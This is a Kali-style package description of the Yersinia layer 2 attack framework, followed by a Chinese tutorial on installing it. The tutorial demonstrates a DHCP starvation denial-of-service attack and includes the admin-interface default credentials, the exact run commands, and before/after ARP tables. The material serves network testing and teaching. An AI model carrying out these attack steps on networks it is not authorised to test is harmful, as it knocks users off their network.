Yersinia Package Description
Yersinia is a framework for performing layer 2 attacks. It is designed to take advantage of some weaknesses in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Attacks for the following network protocols are implemented in this particular release:
- Spanning Tree Protocol (STP)
- Cisco Discovery Protocol (CDP)
- Dynamic Trunking Protocol (DTP)
- Dynamic Host Configuration Protocol (DHCP)
- Hot Standby Router Protocol (HSRP)
- 802.1q
- 802.1x
- Inter-Switch Link Protocol (ISL)
- VLAN Trunking Protocol (VTP)
Source: https://github.com/tomac/yersinia
Yersinia Homepage | Kali Yersinia Repo
- Author: Alfredo Andres Omella, David Barroso Berrueta
- License: GPLv2
Tools included in the yersinia package
yersinia – Network vulnerability check software
root@kali:~# yersinia -h
۲�۲��
�������۲�
۲��������۲�
�����۱����������
����۱������������
����۱������������� Yersinia...
������������������۲��
۲���۱��������������۲�� The Black Death for nowadays networks
������۱�����������������
�������۱���������������۲� by Slay & tomac
۲�����۱�������������������
�����۱������������������� http://www.yersinia.net
۲����۱���������������۲ yersinia@yersinia.net
۲�����۱���������������
�������۱����������۲�
�۲���������۱������� Prune your MSTP, RSTP, STP trees!!!!
�������������۲�
Usage: yersinia [-hVGIDd] [-l logfile] [-c conffile] protocol [protocol_options]
-V Program version.
-h This help screen.
-G Graphical mode (GTK).
-I Interactive mode (ncurses).
-D Daemon mode.
-d Debug.
-l logfile Select logfile.
-c conffile Select config file.
protocol One of the following: cdp, dhcp, dot1q, dot1x, dtp, hsrp, isl, mpls, stp, vtp.
Try 'yersinia protocol -h' to see protocol_options help
Please, see the man page for a full list of options and many examples.
Send your bugs & suggestions to the Yersinia developers <yersinia@yersinia.net>
MOTD: The Hakin9 magazine owe money to us... 500 Euros
Yersinia Usage Example
root@kali:~# yersinia -G
系统安装需求:
-
OpenBSD 3.4 (note: upgrade your pcap libraries to at least 0.7.2)
-
Linux 2.4.x and 2.6.x
-
Solaris 5.8 64bits SPARC
-
Mac OSX 10.4 Tiger (Intel)
笔者使用操作系统:
ubuntu-10.04-server-i386.iso :http://mirror.zjut.com/cdimage/ubuntu-10.04-server-i386.iso
虚拟机:vmare 7.0
一、安装步骤
系统安装完成后,需要在虚拟的ubuntu系统内执行如下命令:
1)、sudo passwd root //提示你输入新的密码,设置完成后可重新登录,测试root账号的登录(yersinia只能工作在英文模式,请不要安装中文包)
2)、保证你的虚拟机能连接互联网:
-
[root@localhost ~]# ifconfig
eth0 Link encap:Ethernet HWaddr 00:90:27:90:10:C7
inet addr:172.16.104.222 Bcast:172.16.104.255 Mask:255.255.255.0
inet6 addr: 2001:1::290:27ff:fe90:10c7/64 Scope:Global
inet6 addr: fe80::290:27ff:fe90:10c7/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:64384076 errors:0 dropped:0 overruns:0 frame:0
TX packets:80585588 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:52522625 (50.0 MiB) TX bytes:3316564186 (3.0 GiB)lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:29316820 errors:0 dropped:0 overruns:0 frame:0
TX packets:29316820 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1189690416 (1.1 GiB) TX bytes:1189690416 (1.1 GiB)[root@localhost ~]# ping 202.98.96.68
PING 202.98.96.68 (202.98.96.68) 56(84) bytes of data.
64 bytes from 202.98.96.68: icmp_seq=1 ttl=251 time=5.75 ms
64 bytes from 202.98.96.68: icmp_seq=2 ttl=251 time=3.93 ms
64 bytes from 202.98.96.68: icmp_seq=3 ttl=251 time=5.20 ms
64 bytes from 202.98.96.68: icmp_seq=4 ttl=251 time=2.79 ms
64 bytes from 202.98.96.68: icmp_seq=5 ttl=251 time=2.07 ms
64 bytes from 202.98.96.68: icmp_seq=6 ttl=251 time=5.73 ms
64 bytes from 202.98.96.68: icmp_seq=7 ttl=251 time=5.86 ms--- 202.98.96.68 ping statistics ---
7 packets transmitted, 7 received, 0% packet loss, time 6000ms
rtt min/avg/max/mdev = 2.070/4.480/5.866/1.444 ms
[root@localhost ~]#3)、安装yersinia
sudo apt-get install yersiniaubuntu它会自动从官方的软件库中将yersinia的所有文件安装完成,不需要你因为对linux不熟悉而烦恼。
检查:
root@ubuntu:~# yersinia
GNU yersinia 0.7.1 $Date: 2006/03/23 08:40:14 $
Try 'yersinia -h' to display the help.
MOTD: Waiting for my surround speakers Audiovector Mi1 Signature... :)
root@ubuntu:~#
4)、安装ssh server(可选,避免每次进入到虚拟机,可通过ssh连接进去)sudo apt-get install openssh-server
5)、ok ,yersina安装全部完成,我们可以通过它来实验一下攻击。
二、简单使用
2.1 yersina 帮助
Usage: yersinia [-hVGIDd] [-l logfile] [-c conffile] protocol [protocol_options]
-V Program version. //查看版本
-h This help screen. //帮助命令
-G Graphical mode (GTK). //图形化界面
-I Interactive mode (ncurses). //交互模式
-D Daemon mode. //后台模式,笔者推荐
-d Debug. //调试械
-l logfile Select logfile.
-c conffile Select config file. //先写好相关攻击配置……
protocol One of the following: cdp, dhcp, dot1q, dot1x, dtp, hsrp, isl, stp, vtp.Try 'yersinia protocol -h' to see protocol_options help
Please, see the man page for a full list of options and many examples.
Send your bugs & suggestions to the Yersinia developers <yersinia@yersinia.net>MOTD: I would like to see romanian wild boars, could you invite me? :)
Mail me at slay _at_ wasahero.org2.2 yersina attack sample
登录用户名与密码:root/root
enable密码:tomac
root@ubuntu:~# telnet localhost 12000
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.Welcome to yersinia version 0.7.1.
Copyright 2004-2005 Slay & Tomac.
login: root
password:MOTD: Do you have a Lexicon CX-7? Share it!! ;)
yersinia> ena
Password:
yersinia#
cancel Cancel running attack
clear Clear stats
cls Clear screen
disable Turn off privileged commands
exit Exit from current level
prueba Test command
run Run attack
set Set specific params for protocols
show Show running system information
yersinia#比如:dhcp 地址耗尽攻击
1、指定源接口
yersinia# set dhcp interface eth0
2、攻击开始
yersinia# run dhcp 1
下面是后面参数
<0> NONDOS attack sending RAW packet
<1> DOS attack sending DISCOVER packet
<2> NONDOS attack creating DHCP rogue server
<3> DOS attack sending RELEASE packet
<cr>
3、检查yersinia# show attacks
No. Protocol Attack
--- -------- ------
0 DHCP sending DISCOVER packet
yersinia# show dhcp attacks
No. Protocol Attack
--- -------- ------
0 DHCP sending DISCOVER packet
4、结果攻击前:
C:\Documents and Settings\Administrator>arp -a
Interface: 172.16.105.14 --- 0x4
Internet Address Physical Address Type
172.16.105.1 00-09-43-30-4d-c1 dynamic
172.16.105.23 00-0c-29-1f-cf-39 dynamic攻击后:
C:\Documents and Settings\Administrator>arp -a
Interface: 172.16.105.14 --- 0x4
Internet Address Physical Address Type
172.16.105.1 00-00-00-00-00-00 invalid
172.16.105.23 00-0c-29-1f-cf-39 dynamic取消攻击后:5(秒)
C:\Documents and Settings\Administrator>arp -a
Interface: 172.16.105.14 --- 0x4
Internet Address Physical Address Type
172.16.105.1 00-09-43-30-4d-c1 dynamic
172.16.105.23 00-0c-29-1f-cf-39 dynamic
172.16.105.248 00-0c-29-76-f3-53 dynamic注:附上命令参数